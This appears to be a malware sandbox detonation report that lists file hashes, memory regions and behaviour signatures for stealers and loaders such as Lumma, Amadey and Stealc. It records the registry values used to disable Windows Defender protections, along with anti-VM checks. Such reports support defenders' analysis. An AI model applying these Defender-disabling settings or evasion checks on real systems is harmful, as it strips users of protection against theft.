C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\adbed570-7d83-4352-98c5-4ff6e7af9c9a
| MD5 | ae890a5b6ecec1571d0673b448ba0470 |
| SHA1 | b8e2550b22870bcb80a4a35768d5d0f4f1fdc0bc |
| SHA256 | d34b1a6e76e50cf09865b8e17a93ac7b89a2ac6b0c0c0fbe63387d086007dcea |
| SHA512 | 5526655064c0fe01dd17c53b1fd80751b1d78fba1427c61ca066e81c1ff4250f470dcdf8f2824977854e54a09d31be011a2b933ea23144af2c8c78d2b800957e |
memory/1052-595-0x0000000000900000-0x0000000000D8C000-memory.dmp
memory/3016-611-0x0000000006830000-0x0000000006D2F000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | e090aab54e2f0794e19abed3cb5e3155 |
| SHA1 | 9a67e7fe56b93e32db414e83ef5e1fc5d69701ec |
| SHA256 | db143ad9406b4c9e908a0ed883ca24322e3d06fb1c18d76ea3f7df179ac26687 |
| SHA512 | 8a6af1d37898bc2908feaf6275cc1fdcf304534db2857c3abc74d50d9af5767d38c234adfc01a5495ccd1cd4bdeae07a6568d3bad57f91dec8513f5d25ad5876 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs.js
| MD5 | 0fb475e84a49926ff8118a77d154a998 |
| SHA1 | 5ae69c9c2b8aeb802fc988cc75cdb58302c15610 |
| SHA256 | ed33bf496ec28960c74515b4ec7f276ec22417295751f6541d989bdb240f67a2 |
| SHA512 | bc60b1657f834ae2cf66b61a6514d46fffb25ff0007b11e4047622dfd33c30b5f7dd3a4dcd76c612cf99c2b33cdd0bed27add11080ac768639ead7a39709dac4 |
memory/2520-678-0x0000000000400000-0x0000000000C62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe
| MD5 | fc6804a55358a117689dab9333fd0ee5 |
| SHA1 | bbe4309bc6d99a67ecc0e866907889659d8e7031 |
| SHA256 | 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58 |
| SHA512 | 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c |
memory/3368-693-0x0000000001340000-0x00000000015E8000-memory.dmp
memory/3016-691-0x0000000006830000-0x0000000006AD8000-memory.dmp
memory/3368-695-0x0000000001340000-0x00000000015E8000-memory.dmp
memory/3368-694-0x0000000001340000-0x00000000015E8000-memory.dmp
memory/3016-705-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/3016-714-0x0000000006830000-0x0000000006AD8000-memory.dmp
memory/2520-715-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3368-720-0x0000000001340000-0x00000000015E8000-memory.dmp
memory/3368-722-0x0000000001340000-0x00000000015E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
| MD5 | b58b926c3574d28d5b7fdd2ca3ec30d5 |
| SHA1 | d260c4ffd603a9cfc057fcb83d678b1cecdf86f9 |
| SHA256 | 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3 |
| SHA512 | b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab |
memory/3016-727-0x0000000000E10000-0x00000000012B2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 48781016853321e4f6a77dc6749c9706 |
| SHA1 | 2f810bf822035f29f2df3504dfe6f73f182c32b4 |
| SHA256 | 8972fd047fd4f504a7444d09809a99d786b49cd4c7394dfbafd5f19cc7d33ef3 |
| SHA512 | 2e26ff07fb5aa69cc9894b7730d4afac6a055ef7c832f50aa67a4e94226ee38ae758589081abe6c6a0f518414caddaaf7ad15c0a43afc2158d6ed3f30f609929 |
memory/3676-733-0x00000000003F0000-0x00000000007F4000-memory.dmp
memory/3676-735-0x00000000003F0000-0x00000000007F4000-memory.dmp
memory/3676-736-0x00000000003F0000-0x00000000007F4000-memory.dmp
memory/3676-739-0x00000000002A0000-0x00000000002AE000-memory.dmp
memory/3676-740-0x0000000000D90000-0x0000000000DEC000-memory.dmp
memory/3676-741-0x0000000000BA0000-0x0000000000BB2000-memory.dmp
memory/3676-742-0x0000000000BC0000-0x0000000000BC8000-memory.dmp
memory/3676-743-0x0000000000BD0000-0x0000000000BD8000-memory.dmp
memory/3676-744-0x0000000000BE0000-0x0000000000BE8000-memory.dmp
memory/3676-745-0x0000000000DF0000-0x0000000000E08000-memory.dmp
memory/3676-746-0x0000000000E80000-0x0000000000E90000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3dcb361fbdf8dc50aa0cf59489512ec7 |
| SHA1 | cf7a1846d7dbbf8307e6df3f1674ca86826fdbd3 |
| SHA256 | 8262c51e6da49475b7c0388ad3ecaa7d412ffd922c3e3f3c7e1af8d70c6ecf73 |
| SHA512 | 5a417fb6024c7a76fa7716978dd664eee2bd8aa220cdf5127dfa58eff2280c66428ad8528b5c04ac99df8fc446506532afab8c9d884b314e6f80a1508264f3bf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs.js
| MD5 | 5725566c588e66de896331e780839483 |
| SHA1 | 857df380d6ecc62c8e7d85c3f54ada09ad543fe9 |
| SHA256 | aa3c141f40ba476ed1c30cf95e1701aef61b2a2f9d401c5bf6c0583c4fd6d807 |
| SHA512 | 89d987286d2a0116c16cbd5d732f0793cb2213020c310ff9fbc054ca4faf1c08b8bddcf8435192eef17c6061eb08efc5ade97a2d60a229bee74e9cc00bd7f5fc |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
memory/2520-791-0x0000000000400000-0x0000000000C62000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs-1.js
| MD5 | de21377f5ebad8c3c23d31372a829c2b |
| SHA1 | 5cd4caae6279b5f218c67aaac96e65ebd8336462 |
| SHA256 | bd859f9c899b646843fad07906ac8fe905608415dd39e05bbf0a9ffb496b2bf7 |
| SHA512 | e55e67c83082250d56f082bc3afeb45e2b93cf46a5d6d8b7967c1480cdc52aa2582667623ecd3882ab3581edb09dcb63e7ab38a9a368841f2c6d12223664f878 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
memory/3016-837-0x0000000000E10000-0x00000000012B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\download.bat
| MD5 | f2a75175c8082ccd3e1713b00556a6e2 |
| SHA1 | 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf |
| SHA256 | 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686 |
| SHA512 | 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 15cbfcce30f6e45dd29460d90ccfca27 |
| SHA1 | 4d29f5747b7c25923a822d1bf67e2c6508ca8112 |
| SHA256 | adddea6a103b58e30d17c83214e3e6c0a394339871c3fa26c306cea7b8e932c4 |
| SHA512 | 082f43a994078a72db6f31d2c70f33de64605d00c95769d6de9a3c449887a057139cfda3d0bb61c2e7b60367bb4a4acef34639a8ee2e3a4d903d73e46f79ffb6 |
C:\Users\Admin\AppData\Local\Temp\runsteal.bat
| MD5 | 744f8978db36b4b9db7cb6e5c8c41e08 |
| SHA1 | 84321921f622d20a4d40c9bef43b7744e74aaee7 |
| SHA256 | cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468 |
| SHA512 | d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f |
C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
| MD5 | 1fed66d1f6b85bda20fe0403ca01c9bd |
| SHA1 | 6a3056191a7d8da167285b2bf5f9fa671022c8c1 |
| SHA256 | 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a |
| SHA512 | 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613 |
C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat
| MD5 | d1fdfad5ce7134b1ef5a54cf37001031 |
| SHA1 | 82e0f4e953b3aeaca622ec071639baf6ae17aadb |
| SHA256 | 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6 |
| SHA512 | b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7 |
memory/3904-894-0x0000000000FF0000-0x000000000101E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs-1.js
| MD5 | 50fbc9745ff9384455c877e8d261eb51 |
| SHA1 | 22d91c811ef03032b925f885b6b960a83595fba9 |
| SHA256 | adb0512e4dfb259db873fb57c50b0f3925f19199ef025cd5c2a25d34222b4c52 |
| SHA512 | 012f855f4238fa811b7fbd175d66183bdac9b1a74b27b983cb1d380ecc604cb4e64e04b4fd7401769d69d90da8150c30a1f76bcfff8f5d64856fe72a6725c2b2 |
memory/2520-919-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-921-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/2520-922-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-923-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/2520-924-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-925-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/2520-936-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-937-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/2520-939-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-940-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/2520-941-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-942-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/2520-943-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-945-0x0000000000E10000-0x00000000012B2000-memory.dmp
memory/2520-949-0x0000000000400000-0x0000000000C62000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\Users\Admin\AppData\Local\Temp\DCeJ53wedDs48BFGwER7w4\Y-Cleaner.exe
| MD5 | a8cf5621811f7fac55cfe8cb3fa6b9f6 |
| SHA1 | 121356839e8138a03141f5f5856936a85bd2a474 |
| SHA256 | 614a0362ab87cee48d0935b5bb957d539be1d94c6fdeb3fe42fac4fbe182c10c |
| SHA512 | 4479d951435f222ca7306774002f030972c9f1715d6aaf512fca9420dd79cb6d08240f80129f213851773290254be34f0ff63c7b1f4d554a7db5f84b69e84bdd |
memory/2520-958-0x0000000000400000-0x0000000000C62000-memory.dmp
memory/3016-959-0x0000000000E10000-0x00000000012B2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-06 02:26
Reported
2024-12-06 02:29
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Amadey
Amadey family
GCleaner
Gcleaner family
Lumma Stealer, LummaC
Lumma family
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
Orcus
Orcus family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1284 created 3524 | N/A | C:\Users\Admin\AppData\Local\Temp\491505\Dr.com | C:\Windows\Explorer.EXE |
TA505
Ta505 family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-ODVJL.tmp\i1A5m12.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
